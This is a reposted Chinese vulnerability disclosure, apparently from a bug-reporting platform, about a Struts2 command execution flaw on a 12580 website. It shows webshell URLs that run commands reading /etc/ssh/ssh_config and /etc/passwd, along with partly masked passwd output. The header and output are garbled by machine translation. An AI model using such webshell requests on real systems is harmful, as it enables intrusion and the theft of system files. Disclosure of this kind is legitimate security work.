漏洞标题 12580某站命令执行已shell可内网渗透 相关厂商 12580 漏洞作者 重瞳 提交时间 2016-05-09 23:10 公开时间 2016-06-26 17:00 漏洞类型 命令执行…
漏洞标题
12580一个站命令执行已被shell内在网络渗透
相关制造商
12580
漏洞作者
重复
提交时间
2016-05-09 23: 10
公共时间
2016-06-26 17: 00
漏洞类型
命令执行
危险等级
高
自我评估等级
11
漏洞状态
已提交给第三方合作机构(cncert National Internet Emergency Center)
标签标签
Webshell,补丁不及时,struts,远程命令执行,第三方框架
漏洞详细信息
1.http://**。**。**/GetHotelListAction!initc.do str2命令执行漏洞_
**********
Failure when receiving data from the peer
3.http://**。**。**/12580.jsppwd=0324& i=cat%20/etc/ssh/ssh_config_
**********
***** dd8b05eb8a75c124cb.png“*****
**********
**********
4.http://**。**。**/12580.jsppwd=0324& i=cat%20/etc/passwd_
**********
**********
*****:/root:/*****
***** bin:/sbi *****
*****:/sbin:/sb *****
***** r/adm:/sb *****
***** ool/lpd:/s *****
*****:/sbin:/*****
***** wn:/sbin:/s *****
*****:/sbin:/*****
*****/spool/mail下*****
***** spool/uucp:/*****
***** tor:/root:/*****
*****/usr/games: *****
***** var/gopher:/*****
*****/var/ftp:/s *****
***** body: /:/s *****
***** sage bus: /:/*****
*****在/var /缓存/RPC *****
*****内存拥有者:/d *****
***** c/abrt:/sb *****
***** r':/var/empty/*****
*****池/后缀*****
*****守护进程: /:/*****
*****/ntp:/sbi *****
***** ck:/var/run/avahi - *****
*****用户:/var/lib *****
***** NFS用户:/var/li *****
***** d SSH:/var/empty *****
*****: /:/sbi *****
*****由OProfile使用:/*****
*****家用/tomca *****
***** home/yz: *****
***** ome/www:/*****
***** /家庭/logu *****
**********
**********
5.http://**。**。**/12580.jsppwd=0324& i=ifconfig执行ifconfig_
*****
Failure when receiving data from the peer
-
发表于 2016-07-17 08:00
- 阅读 ( 515 )
- 分类:黑客技术